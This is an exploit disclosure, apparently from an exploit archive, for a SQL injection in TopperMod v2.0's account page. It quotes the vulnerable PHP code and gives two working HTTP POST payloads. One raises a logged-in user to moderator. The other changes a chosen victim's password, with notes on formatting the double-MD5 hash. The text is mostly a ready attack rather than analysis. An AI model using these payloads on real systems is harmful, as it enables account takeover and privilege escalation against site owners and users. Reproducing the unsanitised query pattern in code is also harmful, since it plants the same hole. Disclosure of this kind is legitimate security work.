TopperMod 2.0 Remote SQL Injection Vulnerability

[r57blg () gmail com]

# Author:       __GiReX__
# mySite:       www.r57shell.in

# CMS:          TopperMod v2.0
# Site:         www.wikipediatr.com

# Bug:          SQL Injection

# Type:         1 - Priviledge Escalation (from user to mod)
                2 - Remote user password change

# File:         /account/index.php
# Var :         $localita

# Need:         magic_quotes_gpc = Off
                You must be logged in


# Vuln Code: /account/index.php:        

        case "edituser_save":
        ...


        $localita=$_POST['localita']; 
        ...

        if ($localita!="") { 
                if (eregi("^[a-zA-Z0-9]",$localita)) {
                        $localita=substr(htmlentities(htmlspecialchars($localita), ENT_QUOTES),0,20);
                }
        }

# And if our $_POST['localita'] does not begin with a char or a number?
# Input not sanizated
        
        ...
        $res=dbquery("UPDATE ".PREFISSO."_utenti SET  email='$email', localita='$localita', sito='$sito', 
                     tema='$tema_user', time_zone='$time_zone'  $pass  
                     WHERE user_id='$user_id' "); 

# Vulnerable query :D

        

# PoC 1:

        POST  /[PATH]/mod.php?mod=account HTTP/1.1
        Host: [TARGET]
        ...headers...

        email=someone () somewhere dot&localita=@', permessi='1&go=edituser_save&user_id=[YOUR_USER_ID]

# PoC 2:

        POST  /[PATH]/mod.php?mod=account HTTP/1.1
        Host: [TARGET]
        ...headers...

        email=someone () somewhere dot&localita=@', password='[PASSWORD]&go=edituser_save&user_id=[VICTIM_USER_ID]



# Note: [PASSWORD] must be the md5 of the md5 of the wanted password, you must forget in the content the end quote
# We can also try to get admin hash trought sql subqueries but the password is crypted into md5 2 times
# and Admins don't use cookies in this CMS...